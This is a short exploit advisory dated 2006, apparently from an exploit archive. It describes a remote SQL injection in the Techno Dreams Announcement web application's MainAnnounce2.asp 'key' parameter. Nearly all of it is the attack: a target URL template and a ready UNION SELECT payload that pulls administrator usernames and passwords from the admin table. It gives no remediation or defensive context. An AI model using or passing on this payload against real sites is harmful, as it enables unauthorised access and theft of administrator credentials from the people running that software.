id: 1089
date: 10/30/2006
title: Techno Dreams Announcement (key) Remote SQL Injection Vulnerability
author: ajann
cves: 

===================================================================
Techno Dreams Announcement (key) Remote SQL Injection Vulnerability
===================================================================



*******************************************************************************
# Title  :  Techno Dreams Announcement (MainAnnounce2.asp) Remote SQL Injection Vulnerability
# Author :   ajann

*******************************************************************************

###http://[target]/[path]/MainAnnounce2.asp?key=[  SQL ]

Example:

//MainAnnounce2.asp?key=204%20union%20select%200,UserName,0,Password,0%20from%20admin


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!


#  0day.today [2023-03-27]  #